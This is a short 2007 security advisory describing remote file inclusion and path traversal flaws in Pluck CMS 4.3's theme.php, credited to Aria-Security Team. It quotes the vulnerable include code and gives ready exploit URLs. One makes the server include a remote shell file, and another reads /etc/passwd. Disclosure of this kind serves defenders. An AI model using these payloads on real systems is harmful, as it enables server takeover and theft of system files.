Lucene search
SecurityvulnsSECURITYVULNS:DOC:17671HistoryAug 03, 2007 - 12:00 a.m.
Pluck 4.3 themes.php Remote File Inclusion and disclosure
2007-08-0300:00:00
vulners.com
62
Aria-Security Team
Pluck 4.3 Remote File Inclusion
Vendor: http://www.pluck-cms.org/
/path/data/inc/theme.php
if Register_global was set as ON then we can use the $dir variable for RFI
(is_file($dir."/".$file))
$files[]=$file;
else
$dirs[]=$dir."/".$file;
}
}
if($dirs) {
foreach ($dirs as $dir) {
include ("$dir/theme.php");
http://example.com/path/data/inc/theme.php?dir=http://site/shell.ext?
fputs($file, "<?php \$themepref = \"$cont\"; ?>");
if Register_global was set as ON then we can use the $file variable for disclosure.
example:
http://example.com/path/data/inc/theme.php?file=../../../../etc/passwd (DEPENDS on server)
Credits: Aria-Security Team
http://aria-security.net
http://outlaw.aria-security.info [PERSONAL BLOG]